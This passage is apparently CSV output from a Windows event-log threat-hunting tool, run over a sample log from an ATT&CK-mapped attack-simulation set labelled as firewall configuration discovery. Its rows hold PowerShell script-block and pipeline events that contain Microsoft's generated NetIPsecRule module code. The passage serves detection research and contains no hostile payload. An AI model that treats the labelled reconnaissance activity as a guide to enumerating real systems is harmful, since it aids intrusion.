${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 